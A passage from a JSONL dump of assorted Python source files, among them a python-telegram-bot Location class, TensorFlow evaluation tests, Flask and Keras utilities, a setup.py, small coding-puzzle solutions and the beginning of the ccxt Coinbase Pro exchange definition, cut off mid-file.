Bills',\n 'ordering': ['-date_expired'],\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a2f36f3b183465e4c10aefcedae56dc18b0d87f", "content": "# Python - 3.6.0\n\ntest.assert_equals(sumin(5), 55)\ntest.assert_equals(sumax(8), 372)\ntest.assert_equals(sumsum(8), 576)\ntest.assert_equals(sumin(15), 1240)\n"} {"ext": "py", "sha": "1a2f371f7afdbbb5d3272fb08bed7e871560e86e", "content": "#!/usr/bin/env python\n#\n# A library that provides a Python interface to the Telegram Bot API\n# Copyright (C) 2015-2021\n# Leandro Toledo de Souza \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser Public License for more details.\n#\n# You should have received a copy of the GNU Lesser Public License\n# along with this program. If not, see [http://www.gnu.org/licenses/].\n\"\"\"This module contains an object that represents a Telegram Location.\"\"\"\n\nfrom typing import Any\n\nfrom telegram import TelegramObject\n\n\nclass Location(TelegramObject):\n \"\"\"This object represents a point on the map.\n\n Objects of this class are comparable in terms of equality. Two objects of this class are\n considered equal, if their :attr:`longitute` and :attr:`latitude` are equal.\n\n Args:\n longitude (:obj:`float`): Longitude as defined by sender.\n latitude (:obj:`float`): Latitude as defined by sender.\n horizontal_accuracy (:obj:`float`, optional): The radius of uncertainty for the location,\n measured in meters; 0-1500.\n live_period (:obj:`int`, optional): Time relative to the message sending date, during which\n the location can be updated, in seconds. For active live locations only.\n heading (:obj:`int`, optional): The direction in which user is moving, in degrees; 1-360.\n For active live locations only.\n proximity_alert_radius (:obj:`int`, optional): Maximum distance for proximity alerts about\n approaching another chat member, in meters. For sent live locations only.\n **kwargs (:obj:`dict`): Arbitrary keyword arguments.\n\n Attributes:\n longitude (:obj:`float`): Longitude as defined by sender.\n latitude (:obj:`float`): Latitude as defined by sender.\n horizontal_accuracy (:obj:`float`): Optional. The radius of uncertainty for the location,\n measured in meters.\n live_period (:obj:`int`): Optional. Time relative to the message sending date, during which\n the location can be updated, in seconds. For active live locations only.\n heading (:obj:`int`): Optional. The direction in which user is moving, in degrees.\n For active live locations only.\n proximity_alert_radius (:obj:`int`): Optional. Maximum distance for proximity alerts about\n approaching another chat member, in meters. 
For sent live locations only.\n\n \"\"\"\n\n def __init__(\n self,\n longitude: float,\n latitude: float,\n horizontal_accuracy: float = None,\n live_period: int = None,\n heading: int = None,\n proximity_alert_radius: int = None,\n **_kwargs: Any,\n ):\n # Required\n self.longitude = float(longitude)\n self.latitude = float(latitude)\n\n # Optionals\n self.horizontal_accuracy = float(horizontal_accuracy) if horizontal_accuracy else None\n self.live_period = int(live_period) if live_period else None\n self.heading = int(heading) if heading else None\n self.proximity_alert_radius = (\n int(proximity_alert_radius) if proximity_alert_radius else None\n )\n\n self._id_attrs = (self.longitude, self.latitude)\n"} {"ext": "py", "sha": "1a2f3777b3029c8ffb0ee5526be2beea1d046bea", "content": "#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\n# Copyright 2020 Ozward Wang\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport struct\n\nHEADER_STRUCT_FORMAT = '!16s16s'\nN_STRUCT_FORMAT = '!H'\n\n\ndef pack_number(number):\n n_struct = struct.Struct(N_STRUCT_FORMAT)\n return n_struct.pack(number)\n\n\ndef unpack_number(data):\n n_struct = struct.Struct(N_STRUCT_FORMAT)\n return n_struct.unpack(data)[0]\n\n\ndef pack_header(leads, identity):\n s_struct = struct.Struct(HEADER_STRUCT_FORMAT)\n if isinstance(identity, str):\n identity = identity.encode('utf-8')[:16]\n else:\n identity = identity[:16]\n return s_struct.pack(leads, identity)\n\n\ndef unpack_header(header):\n s_struct = struct.Struct(HEADER_STRUCT_FORMAT)\n leads, identity = s_struct.unpack(header)\n return leads, identity\n\n\ndef pack_iv(data, iv):\n return data[:2] + iv + data[2:]\n\n\ndef unpack_iv(header):\n data = header[:2] + header[18:]\n iv = header[2:18]\n return iv, data\n\n\ndef pack_body(data, tail):\n return data + tail\n\n\ndef unpack_body(body):\n return body[:-4], body[-4:]\n\n\n\n"} {"ext": "py", "sha": "1a2f390c5688bbd1a52ab90c6fc0d7967e83b56d", "content": "\n\n#from app import app, db\nfrom app import db\nfrom sqlalchemy.orm import relationship\nimport datetime\n\nclass Post(db.Model):\n \"\"\"\n Table schema\n \"\"\"\n __tablename__ = \"posts\"\n \n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n post_id = db.Column(db.Text(), nullable=False)\n origin_blog = db.Column(db.Integer, db.ForeignKey('blogs.id'))\n date = db.Column(db.DateTime(), nullable=False)\n content = db.Column(db.Text(), nullable=False)\n title = db.Column(db.Text())\n post_url = db.Column(db.Text())\n \n blog = relationship(\"Blog\", back_populates=\"posts\")\n \n \n def __repr__(self):\n return \"Post: {}.\".format(self.title)\n \n @staticmethod\n def get_posts():\n return Post.query.order_by(Post.date.desc()).limit(10).all()\n \n\nclass Blog(db.Model):\n \"\"\"\n Blog model\n \"\"\"\n __tablename__ = \"blogs\"\n \n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n url = db.Column(db.Text())\n feed_url = db.Column(db.Text())\n last_update = db.Column(db.DateTime())\n name = db.Column(db.Text())\n posts = 
relationship(\"Post\", order_by=Post.id, back_populates=\"blog\")\n \n \n\n"} {"ext": "py", "sha": "1a2f3965932293b6381f41183d7f941abc26d964", "content": "# -*- coding: utf-8 -*-\n\"\"\"setup.py\"\"\"\n\nimport os\nimport sys\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\n\nclass Tox(TestCommand):\n user_options = [('tox-args=', 'a', 'Arguments to pass to tox')]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.tox_args = None\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n import tox\n import shlex\n if self.tox_args:\n errno = tox.cmdline(args=shlex.split(self.tox_args))\n else:\n errno = tox.cmdline(self.test_args)\n sys.exit(errno)\n\n\ndef read_content(filepath):\n with open(filepath) as fobj:\n return fobj.read()\n\n\nclassifiers = [\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n]\n\n\nlong_description = (\n read_content(\"README.rst\") +\n read_content(os.path.join(\"docs/source\", \"CHANGELOG.rst\")))\n\nrequires = [\n 'pyyaml', \n 'setuptools',\n 'click',\n 'sphinx-click',\n 'texttable',\n 'coverage'\n]\n\nextras_require = {\n 'reST': ['Sphinx'],\n}\n\nif os.environ.get('READTHEDOCS', None):\n extras_require['reST'].append('recommonmark')\n\nsetup(name='pymerit',\n version='0.1.0',\n description='Standardized metadata',\n long_description=long_description,\n author='Venkata Pingali',\n author_email='pingali@scribbledata.io',\n url='https://github.com/pingali/pymerit',\n classifiers=classifiers,\n packages=['pymerit'],\n data_files = [(\"\", [\"LICENSE.txt\"])],\n install_requires=requires,\n include_package_data=True,\n extras_require=extras_require,\n tests_require=['tox'],\n cmdclass={'test': Tox},\n entry_points = {\n 'console_scripts': ['merit=pymerit.cli:main'],\n }\n)\n"} {"ext": "py", "sha": "1a2f39848bdc7abd1070f4ff458db1facf4a6ebd", "content": "# Copyright 2017 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for tf.training.evaluation.\"\"\"\n\nimport os\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import random_seed\nfrom tensorflow.python.layers import layers\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import metrics as metrics_module\nfrom tensorflow.python.ops import state_ops\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.python.ops.losses import losses\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.training import basic_session_run_hooks\nfrom tensorflow.python.training import evaluation\nfrom tensorflow.python.training import gradient_descent\nfrom tensorflow.python.training import monitored_session\nfrom tensorflow.python.training import saver\nfrom tensorflow.python.training import training\n\n_USE_GLOBAL_STEP = 0\n\n\ndef logistic_classifier(inputs):\n return layers.dense(inputs, 1, activation=math_ops.sigmoid)\n\n\ndef local_variable(init_value, name):\n return variable_scope.get_variable(\n name,\n dtype=dtypes.float32,\n initializer=init_value,\n trainable=False,\n collections=[ops.GraphKeys.LOCAL_VARIABLES])\n\n\nclass EvaluateOnceTest(test.TestCase):\n\n def setUp(self):\n super(EvaluateOnceTest, self).setUp()\n\n # Create an easy training set:\n np.random.seed(0)\n\n self._inputs = np.zeros((16, 4))\n self._labels = np.random.randint(0, 2, size=(16, 1)).astype(np.float32)\n\n for i in range(16):\n j = int(2 * self._labels[i] + np.random.randint(0, 2))\n self._inputs[i, j] = 1\n\n def _train_model(self, checkpoint_dir, num_steps):\n \"\"\"Trains a simple classification model.\n\n Note that the data has been configured such that after around 300 steps,\n the model has memorized the dataset (e.g. 
we can expect %100 accuracy).\n\n Args:\n checkpoint_dir: The directory where the checkpoint is written to.\n num_steps: The number of steps to train for.\n \"\"\"\n with ops.Graph().as_default():\n random_seed.set_random_seed(0)\n tf_inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n tf_labels = constant_op.constant(self._labels, dtype=dtypes.float32)\n\n tf_predictions = logistic_classifier(tf_inputs)\n loss_op = losses.log_loss(labels=tf_labels, predictions=tf_predictions)\n\n optimizer = gradient_descent.GradientDescentOptimizer(learning_rate=1.0)\n train_op = optimizer.minimize(loss_op,\n training.get_or_create_global_step())\n\n with monitored_session.MonitoredTrainingSession(\n checkpoint_dir=checkpoint_dir,\n hooks=[basic_session_run_hooks.StopAtStepHook(num_steps)]) as session:\n loss = None\n while not session.should_stop():\n _, loss = session.run([train_op, loss_op])\n\n if num_steps >= 300:\n assert loss < .015\n\n def testEvaluatePerfectModel(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(),\n 'evaluate_perfect_model_once')\n\n # Train a Model to completion:\n self._train_model(checkpoint_dir, num_steps=300)\n\n # Run\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n labels = constant_op.constant(self._labels, dtype=dtypes.float32)\n logits = logistic_classifier(inputs)\n predictions = math_ops.round(logits)\n\n accuracy, update_op = metrics_module.accuracy(labels, predictions)\n\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=update_op,\n final_ops={'accuracy': (accuracy, update_op)},\n hooks=[\n evaluation._StopAfterNEvalsHook(1),\n ])\n self.assertGreater(final_ops_values['accuracy'], .99)\n\n def testEvaluateWithFiniteInputs(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(),\n 'evaluate_with_finite_inputs')\n\n # Train a Model to completion:\n self._train_model(checkpoint_dir, num_steps=300)\n\n # Run evaluation. Inputs are fed through input producer for one epoch.\n all_inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n all_labels = constant_op.constant(self._labels, dtype=dtypes.float32)\n\n single_input, single_label = training.slice_input_producer(\n [all_inputs, all_labels], num_epochs=1)\n inputs, labels = training.batch([single_input, single_label], batch_size=6,\n allow_smaller_final_batch=True)\n\n logits = logistic_classifier(inputs)\n predictions = math_ops.round(logits)\n\n accuracy, update_op = metrics_module.accuracy(labels, predictions)\n\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=update_op,\n final_ops={\n 'accuracy': (accuracy, update_op),\n 'eval_steps': evaluation._get_or_create_eval_step()\n },\n hooks=[\n evaluation._StopAfterNEvalsHook(None),\n ])\n self.assertTrue(final_ops_values['accuracy'] > .99)\n # Runs evaluation for 4 iterations. 
First 2 evaluate full batch of 6 inputs\n # each; the 3rd iter evaluates the remaining 4 inputs, and the last one\n # triggers an error which stops evaluation.\n self.assertEqual(final_ops_values['eval_steps'], 4)\n\n def testEvalOpAndFinalOp(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(), 'eval_ops_and_final_ops')\n\n # Train a model for a single step to get a checkpoint.\n self._train_model(checkpoint_dir, num_steps=1)\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n # Create the model so we have something to restore.\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n logistic_classifier(inputs)\n\n num_evals = 5\n final_increment = 9.0\n\n my_var = local_variable(0.0, name='MyVar')\n eval_ops = state_ops.assign_add(my_var, 1.0)\n final_ops = array_ops.identity(my_var) + final_increment\n\n final_hooks = [evaluation._StopAfterNEvalsHook(num_evals),]\n initial_hooks = list(final_hooks)\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=eval_ops,\n final_ops={'value': final_ops},\n hooks=final_hooks)\n self.assertEqual(final_ops_values['value'], num_evals + final_increment)\n self.assertEqual(initial_hooks, final_hooks)\n\n def testMultiEvalStepIncrements(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(), 'eval_ops_and_final_ops')\n\n # Train a model for a single step to get a checkpoint.\n self._train_model(checkpoint_dir, num_steps=1)\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n # Create the model so we have something to restore.\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n logistic_classifier(inputs)\n\n num_evals = 6\n\n my_var = local_variable(0.0, name='MyVar')\n # In eval ops, we also increase the eval step one more time.\n eval_ops = [state_ops.assign_add(my_var, 1.0),\n state_ops.assign_add(\n evaluation._get_or_create_eval_step(), 1, use_locking=True)]\n expect_eval_update_counts = num_evals // 2\n\n final_ops = array_ops.identity(my_var)\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path,\n eval_ops=eval_ops,\n final_ops={'value': final_ops},\n hooks=[evaluation._StopAfterNEvalsHook(num_evals),])\n self.assertEqual(final_ops_values['value'], expect_eval_update_counts)\n\n def testOnlyFinalOp(self):\n checkpoint_dir = os.path.join(self.get_temp_dir(), 'only_final_ops')\n\n # Train a model for a single step to get a checkpoint.\n self._train_model(checkpoint_dir, num_steps=1)\n checkpoint_path = saver.latest_checkpoint(checkpoint_dir)\n\n # Create the model so we have something to restore.\n inputs = constant_op.constant(self._inputs, dtype=dtypes.float32)\n logistic_classifier(inputs)\n\n final_increment = 9.0\n\n my_var = local_variable(0.0, name='MyVar')\n final_ops = array_ops.identity(my_var) + final_increment\n\n final_ops_values = evaluation._evaluate_once(\n checkpoint_path=checkpoint_path, final_ops={'value': final_ops})\n self.assertEqual(final_ops_values['value'], final_increment)\n\n\nif __name__ == '__main__':\n test.main()\n"} {"ext": "py", "sha": "1a2f39b527b64a4f5dc39a9b4f4a86f5fc710033", "content": "class Solution:\n def decodeCiphertext(self, encodedText: str, rows: int) -> str:\n n = len(encodedText)\n cols = n // rows\n\n ans = []\n matrix = [[' '] * cols for _ in range(rows)]\n\n for i in range(rows):\n for j in range(cols):\n matrix[i][j] = encodedText[i * cols + j]\n\n for col in range(cols):\n i = 0\n j = col\n while i < rows and j < cols:\n ans.append(matrix[i][j])\n i += 1\n j += 
1\n\n return ''.join(ans).rstrip()\n"} {"ext": "py", "sha": "1a2f39cc0bde5b4bee29b348df8d7c8b3c876311", "content": "import sqlite3\n\nconn = sqlite3.connect('emaildb.sqlite')\ncur = conn.cursor()\n\ncur.execute('''\nDROP TABLE IF EXISTS Counts''')\n\ncur.execute('''\nCREATE TABLE Counts (email TEXT, count INTEGER)''')\n\nfname = raw_input('Enter file name: ')\nif ( len(fname) < 1 ) : fname = 'mbox-short.txt'\nfh = open(fname)\nfor line in fh:\n if not line.startswith('From: ') : continue\n pieces = line.split()\n email = pieces[1]\n email = email.split(\"@\",1)[1]\n dir(email)\n #print email\n cur.execute('SELECT count FROM Counts WHERE email = ? ', (email, ))\n row = cur.fetchone()\n if row is None:\n cur.execute('''INSERT INTO Counts (email, count) \n VALUES ( ?, 1 )''', ( email, ) )\n else : \n cur.execute('UPDATE Counts SET count=count+1 WHERE email = ?', \n (email, ))\n # This statement commits outstanding changes to disk each \n # time through the loop - the program can be made faster \n # by moving the commit so it runs only after the loop completes\n conn.commit()\n\n# https://www.sqlite.org/lang_select.html\nsqlstr = 'SELECT email, count FROM Counts ORDER BY count DESC'\n\nprint \"Counts:\"\nfor row in cur.execute(sqlstr) :\n print str(row[0]), row[1]\n\ncur.close()\n\n"} {"ext": "py", "sha": "1a2f3a32f18a9cbadd9eb5bd3299cb2ea83b186e", "content": "import os\nimport re\nimport numpy as np\nfrom PIL import Image\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nfrom sklearn.preprocessing import LabelEncoder\n\nclass ModelManager():\n def __init__(self, db, s3, graph, backup_model, backup_label_encoder, collection_name='models', bucket_name='models'):\n self.conn = db[collection_name]\n self.s3_bucket = s3.Bucket(bucket_name)\n self.label_encoder = LabelEncoder()\n self.model = None\n self.backup_model = backup_model\n self.backup_label_encoder = backup_label_encoder\n self.graph = graph\n\n def predict(self, image_array):\n \"\"\"Function that accepts a model and image_array and returns a prediction.\"\"\"\n if self.model:\n with self.graph.as_default():\n out = self.model.predict_classes(image_array)\n return self.label_encoder.inverse_transform(out)\n with self.graph.as_default():\n out = self.backup_model.predict_classes(image_array)\n return self.backup_label_encoder.inverse_transform(out)\n \n def preprocess(self, image_file):\n \"\"\"Preprocess the given image file by resizing and turning it into an array.\"\"\"\n img = Image.open(image_file)\n image_resize = img.resize((40, 24))\n image = img_to_array(image_resize)\n x = image.reshape(1, 40, 24, 1)\n return x / 255\n\n def load(self, model_path, label_encoder_path):\n \"\"\"Load a fitted model from the local filesystem into memory. 
\"./models/classes.npy\"\"\"\n self.label_encoder.classes_ = np.load(label_encoder_path)\n self.model = load_model(model_path)\n\n def load_latest_model(self):\n \"\"\"Load a fitted model from a remote filesystem into memory.\"\"\"\n latest_model = list(self.conn.find({'stage': 'PRODUCTION'}).sort([(\"version\", -1)]).limit(1))\n if len(latest_model) == 0:\n return\n\n latest_model = latest_model[0]\n if 'MODEL_NAME' in os.environ and latest_model['name'] == os.environ['MODEL_NAME']:\n if 'MODEL_VERSION' in os.environ and str(latest_model['version']) == os.environ['MODEL_VERSION']:\n return\n\n for f in os.listdir('./models'):\n if not f.endswith(\".h5\") and not f.endswith(\".npy\"):\n continue\n os.remove(os.path.join('./models', f))\n \n # Download model h5 file\n model = re.sub('name', latest_model['name'], latest_model['naming_format'])\n model = re.sub('0', str(latest_model['version']), model)\n self.s3_bucket.download_file(model, f'./models/{model}')\n\n # Download model classes npy file\n classes = re.sub('name', latest_model['name'], latest_model['naming_format'])\n classes = re.sub('0', str(latest_model['version']), classes)\n classes = re.sub('h5', 'npy', classes)\n self.s3_bucket.download_file(classes, f'./models/{classes}')\n os.environ['MODEL_NAME'] = latest_model['name']\n os.environ['MODEL_VERSION'] = str(latest_model['version'])\n\n def get_latest_online_model_version(self):\n initial_model = list(self.conn.find({\"name\": 'online-model'}).sort([(\"version\", -1)]).limit(1))[0]\n return initial_model.version if initial_model else 0\n\n def _insert(self, name, version, metrics_str, naming_format, stage):\n model_doc = {\n \"name\": name, \n \"version\": version, \n \"naming_format\": naming_format,\n \"metrics\": metrics_str, \n \"stage\": stage\n }\n self.conn.insert_one(model_doc)\n\n def publish_model(self, model_path, classes_path, name, metrics):\n latest_model = list(self.conn.find({'stage': 'PRODUCTION', 'name': name}).sort([(\"version\", -1)]).limit(1))\n # Save model file to AWS S3 bucket \n version = 1\n if len(latest_model) > 0:\n version = latest_model[0].version + 1\n\n self.s3_bucket.upload_file(Filename=model_path, Key=f'{name}-v{version}.h5')\n self.s3_bucket.upload_file(Filename=classes_path, Key=f'{name}-v{version}.npy')\n\n # Create and save a new model doc with related information\n self._insert(name, version, metrics, 'name-v0.h5', 'PRODUCTION')\n\n"} {"ext": "py", "sha": "1a2f3a96bacadd20f43b044dc038ace0d13d6a37", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.async_support.base.exchange import Exchange\n\n# -----------------------------------------------------------------------------\n\ntry:\n basestring # Python 3\nexcept NameError:\n basestring = str # Python 2\nimport hashlib\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidAddress\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import NotSupported\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import OnMaintenance\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\nfrom ccxt.base.precise import Precise\n\n\nclass 
coinbasepro(Exchange):\n\n def describe(self):\n return self.deep_extend(super(coinbasepro, self).describe(), {\n 'id': 'coinbasepro',\n 'name': 'Coinbase Pro',\n 'countries': ['US'],\n 'rateLimit': 1000,\n 'userAgent': self.userAgents['chrome'],\n 'pro': True,\n 'has': {\n 'cancelAllOrders': True,\n 'cancelOrder': True,\n 'CORS': True,\n 'createDepositAddress': True,\n 'createOrder': True,\n 'deposit': True,\n 'fetchAccounts': True,\n 'fetchBalance': True,\n 'fetchCurrencies': True,\n 'fetchClosedOrders': True,\n 'fetchDepositAddress': False, # the exchange does not have self method, only createDepositAddress, see https://github.com/ccxt/ccxt/pull/7405\n 'fetchMarkets': True,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchOrderBook': True,\n 'fetchOrders': True,\n 'fetchOrderTrades': True,\n 'fetchTime': True,\n 'fetchTicker': True,\n 'fetchTrades': True,\n 'fetchTransactions': True,\n 'withdraw': True,\n 'fetchDeposits': True,\n 'fetchWithdrawals': True,\n },\n 'timeframes': {\n '1m': 60,\n '5m': 300,\n '15m': 900,\n '1h': 3600,\n '6h': 21600,\n '1d': 86400,\n },\n 'hostname': 'pro.coinbase.com',\n 'urls': {\n 'test': {\n 'public': 'https://api-public.sandbox.pro.coinbase.com',\n 'private': 'https://api-public.sandbox.pro.coinbase.com',\n },\n 'logo': 'https://user-images.githubusercontent.com/1294454/41764625-63b7ffde-760a-11e8-996d-a6328fa9347a.jpg',\n 'api': {\n 'public': 'https://api.{hostname}',\n 'private': 'https://api.{hostname}',\n },\n 'www': 'https://pro.coinbase.com/',\n 'doc': 'https://docs.pro.coinbase.com',\n 'fees': [\n 'https://docs.pro.coinbase.com/#fees',\n 'https://support.pro.coinbase.com/customer/en/portal/articles/2945310-fees',\n ],\n },\n 'requiredCredentials': {\n 'apiKey': True,\n 'secret': True,\n 'password': True,\n },\n 'api': {\n 'public': {\n 'get': [\n 'currencies',\n 'products',\n 'products/{id}',\n 'products/{id}/book',\n 'products/{id}/candles',\n 'products/{id}/stats',\n 'products/{id}/ticker',\n 'products/{id}/trades',\n 'time',\n ],\n },\n 'private': {\n 'get': [\n 'accounts',\n 'accounts/{id}',\n 'accounts/{id}/holds',\n 'accounts/{id}/ledger',\n 'accounts/{id}/transfers',\n 'coinbase-accounts',\n 'fills',\n 'funding',\n 'fees',\n 'margin/profile_information',\n 'margin/buying_power',\n 'margin/withdrawal_power',\n 'margin/withdrawal_power_all',\n 'margin/exit_plan',\n 'margin/liquidation_history',\n 'margin/position_refresh_amounts',\n 'margin/status',\n 'oracle',\n 'orders',\n 'orders/{id}',\n 'orders/client:{client_oid}',\n 'otc/orders',\n 'payment-methods',\n 'position',\n 'profiles',\n 'profiles/{id}',\n 'reports/{report_id}',\n 'transfers',\n 'transfers/{transfer_id}',\n 'users/self/exchange-limits',\n 'users/self/hold-balances',\n 'users/self/trailing-volume',\n 'withdrawals/fee-estimate',\n ],\n 'post': [\n 'conversions',\n 'deposits/coinbase-account',\n 'deposits/payment-method',\n 'coinbase-accounts/{id}/addresses',\n 'funding/repay',\n 'orders',\n 'position/close',\n 'profiles/margin-transfer',\n 'profiles/transfer',\n 'reports',\n 'withdrawals/coinbase',\n 'withdrawals/coinbase-account',\n 'withdrawals/crypto',\n 'withdrawals/payment-method',\n ],\n 'delete': [\n 'orders',\n 'orders/client:{client_oid}',\n 'orders/{id}',\n ],\n },\n },\n 'commonCurrencies': {\n 'CGLD': 'CELO',\n },\n 'precisionMode': TICK_SIZE,\n 'fees': {\n 'trading': {\n 'tierBased': True, # complicated tier system per coin\n 'percentage': True,\n 'maker': 0.5 / 100, # highest fee of all tiers\n 'taker': 0.5 / 
100, # highest fee of all tiers\n },\n 'funding': {\n 'tierBased': False,\n 'percentage': False,\n 'withdraw': {\n 'BCH': 0,\n 'BTC': 0,\n 'LTC': 0,\n 'ETH': 0,\n 'EUR': 0.15,\n 'USD': 25,\n },\n 'deposit': {\n 'BCH': 0,\n 'BTC': 0,\n 'LTC': 0,\n 'ETH': 0,\n 'EUR': 0.15,\n 'USD': 10,\n },\n },\n },\n 'exceptions': {\n 'exact': {\n 'Insufficient funds': InsufficientFunds,\n 'NotFound': OrderNotFound,\n 'Invalid API Key': AuthenticationError,\n 'invalid signature': AuthenticationError,\n 'Invalid Passphrase': AuthenticationError,\n 'Invalid order id': InvalidOrder,\n 'Private rate limit exceeded': RateLimitExceeded,\n 'Trading pair not available': PermissionDenied,\n 'Product not found': InvalidOrder,\n },\n 'broad': {\n 'Order already done': OrderNotFound,\n 'order not found': OrderNotFound,\n 'price too small': InvalidOrder,\n 'price too precise': InvalidOrder,\n 'under maintenance': OnMaintenance,\n 'size is too small': InvalidOrder,\n 'Cancel only mode': OnMaintenance, # https://github.com/ccxt/ccxt/issues/7690\n },\n },\n })\n\n async def fetch_currencies(self, params={}):\n response = await self.publicGetCurrencies(params)\n #\n # [\n # {\n # id: 'XTZ',\n # name: 'Tezos',\n # min_size: '0.000001',\n # status: 'online',\n # message: '',\n # max_precision: '0.000001',\n # convertible_to: [],\n # details: {\n # type: 'crypto',\n # symbol: 'Τ',\n # network_confirmations: 60,\n # sort_order: 53,\n # crypto_address_link: 'https://tzstats.com/{{address}}',\n # crypto_transaction_link: 'https://tzstats.com/{{txId}}',\n # push_payment_methods: ['crypto'],\n # group_types: [],\n # display_name: '',\n # processing_time_seconds: 0,\n # min_withdrawal_amount: 1\n # }\n # }\n # ]\n #\n result = {}\n for i in range(0, len(response)):\n currency = response[i]\n id = self.safe_string(currency, 'id')\n name = self.safe_string(currency, 'name')\n code = self.safe_currency_code(id)\n details = self.safe_value(currency, 'details', {})\n precision = self.safe_number(currency, 'max_precision')\n status = self.safe_string(currency, 'status')\n active = (status == 'online')\n result[code] = {\n 'id': id,\n 'code': code,\n 'info': currency,\n 'type': self.safe_string(details, 'type'),\n 'name': name,\n 'active': active,\n 'fee': None,\n 'precision': precision,\n 'limits': {\n 'amount': {\n 'min': self.safe_number(details, 'min_size'),\n 'max': None,\n },\n 'withdraw': {\n 'min': self.safe_number(details, 'min_withdrawal_amount'),\n 'max': None,\n },\n },\n }\n return result\n\n async def fetch_markets(self, params={}):\n response = await self.publicGetProducts(params)\n #\n # [\n # {\n # \"id\":\"ZEC-BTC\",\n # \"base_currency\":\"ZEC\",\n # \"quote_currency\":\"BTC\",\n # \"base_min_size\":\"0.01000000\",\n # \"base_max_size\":\"1500.00000000\",\n # \"quote_increment\":\"0.00000100\",\n # \"base_increment\":\"0.00010000\",\n # \"display_name\":\"ZEC/BTC\",\n # \"min_market_funds\":\"0.001\",\n # \"max_market_funds\":\"30\",\n # \"margin_enabled\":false,\n # \"post_only\":false,\n # \"limit_only\":false,\n # \"cancel_only\":false,\n # \"trading_disabled\":false,\n # \"status\":\"online\",\n # \"status_message\":\"\"\n # }\n # ]\n #\n result = []\n for i in range(0, len(response)):\n market = response[i]\n id = self.safe_string(market, 'id')\n baseId = self.safe_string(market, 'base_currency')\n quoteId = self.safe_string(market, 'quote_currency')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n priceLimits = {\n 'min': self.safe_number(market, 
